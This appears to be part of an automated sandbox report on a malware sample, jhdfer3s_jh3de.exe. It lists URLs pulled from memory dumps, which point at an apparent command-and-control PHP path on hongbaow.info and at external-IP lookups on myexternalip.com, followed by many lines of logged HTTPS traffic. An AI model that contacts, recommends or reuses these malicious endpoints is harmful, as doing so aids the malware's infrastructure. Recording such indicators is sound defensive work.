Source: jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097247567.0000000003504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpUnivX
Source: jhdfer3s_jh3de.exe, 00000000.00000003.3145113665.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2795648427.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378153155.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443167329.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326084917.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3558965547.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853814644.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616335320.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970287415.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2559977110.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911726400.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3210978854.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097230184.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028603361.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436831948.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501916876.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678157513.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325432064.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210113032.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2151303994.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501630611.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpUniverse
Source: jhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2151326900.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034486376.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501939925.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3211078064.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098827051.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678352941.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443449461.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325565275.0000000003504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpV
Source: jhdfer3s_jh3de.exe, 00000000.00000003.3145113665.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2795648427.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378153155.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3558965547.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853814644.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616335320.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970287415.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2559977110.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911726400.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3210978854.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097230184.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028603361.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436831948.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501916876.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678157513.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325432064.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501630611.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616018816.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phperse
Source: jhdfer3s_jh3de.exe, 00000000.00000003.3145113665.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2795648427.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378153155.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443167329.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326084917.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3558965547.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853814644.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616335320.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098807259.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970287415.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2559977110.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911726400.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3210978854.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034537498.0000000003565000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097230184.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028603361.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436831948.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501916876.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678157513.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325432064.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210113032.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpg
Source: jhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3211078064.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325565275.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097247567.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970308060.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2795674163.0000000003504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpocat
Source: jhdfer3s_jh3de.exe, 00000000.00000003.3145113665.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2795648427.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378153155.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3558965547.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853814644.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616335320.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970287415.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2559977110.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911726400.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3210978854.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097230184.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028603361.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436831948.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678157513.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325432064.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616018816.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpw
Source: jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098827051.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325565275.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097247567.0000000003504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php~Z
Source: jhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325565275.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097247567.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970308060.0000000003504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/5
Source: jhdfer3s_jh3de.exe, 00000000.00000003.1983688533.0000000003550000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1860455007.0000000003550000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918744844.0000000003550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/9
Source: jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/B
Source: jhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/R
Source: jhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/S
Source: jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/T
Source: jhdfer3s_jh3de.exe, 00000000.00000002.3627602678.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php
Source: jhdfer3s_jh3de.exe, 00000000.00000003.1983537025.0000000003504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/Y
Source: jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678352941.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970308060.0000000003504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/YT
Source: jhdfer3s_jh3de.exe, 00000000.00000003.1918744844.0000000003550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/baow.info/
Source: jhdfer3s_jh3de.exe, 00000000.00000003.2443167329.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/baow.info/lofzqFkc7.php
Source: jhdfer3s_jh3de.exe, 00000000.00000003.2678157513.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616018816.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.3627602678.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/baow.info/lofzqFkc7.php9
Source: jhdfer3s_jh3de.exe, 00000000.00000003.1860455007.0000000003550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/hongbaow.info
Source: jhdfer3s_jh3de.exe, 00000000.00000003.3028523059.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918744844.0000000003550000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443167329.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.3627602678.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/lofzqFkc7.php
Source: jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559176039.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3210893502.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911726400.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3377934957.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034572368.0000000003550000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325499865.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2559878509.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028523059.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/lofzqFkc7.php9
Source: jhdfer3s_jh3de.exe, 00000000.00000002.3627003255.0000000000E53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myexternalip.com/
Source: jhdfer3s_jh3de.exe, 00000000.00000002.3627003255.0000000000E53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myexternalip.com/4
Source: jhdfer3s_jh3de.exe, 00000000.00000002.3627003255.0000000000E36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myexternalip.com/raw
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55902
Source: unknownNetwork traffic detected: HTTP traffic on port 55959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56207 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55904
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55900
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55901
Source: unknownNetwork traffic detected: HTTP traffic on port 56213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56038
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56216 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56200
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56201
Source: unknownNetwork traffic detected: HTTP traffic on port 55997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 56088 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56204 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56225 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55997
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56206
Source: unknownNetwork traffic detected: HTTP traffic on port 55897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56207
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56208
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56209
Source: unknownNetwork traffic detected: HTTP traffic on port 56197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56202
Source: unknownNetwork traffic detected: HTTP traffic on port 55916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56203
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56204
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56205
Source: unknownNetwork traffic detected: HTTP traffic on port 55902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56210
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56211
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56212
Source: unknownNetwork traffic detected: HTTP traffic on port 56219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56119 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56217
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56218
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56219
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56213
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56214
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56215
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56216
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56220
Source: unknownNetwork traffic detected: HTTP traffic on port 55901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56221
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56222
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56223
Source: unknownNetwork traffic detected: HTTP traffic on port 56218 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56061
Source: unknownNetwork traffic detected: HTTP traffic on port 56221 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56227 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56228
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55899
Source: unknownNetwork traffic detected: HTTP traffic on port 56210 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56229
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56224
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56225
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56226
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55897
Source: unknownNetwork traffic detected: HTTP traffic on port 56195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56227
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56077
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56198
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56231
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56199
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56232
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56233
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56234
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56194
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56195
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56196
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56197
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56230
Source: unknownNetwork traffic detected: HTTP traffic on port 56224 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56193
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56226 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56114
Source: unknownNetwork traffic detected: HTTP traffic on port 56198 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56088
Source: unknownNetwork traffic detected: HTTP traffic on port 56114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56200 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56208 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55959
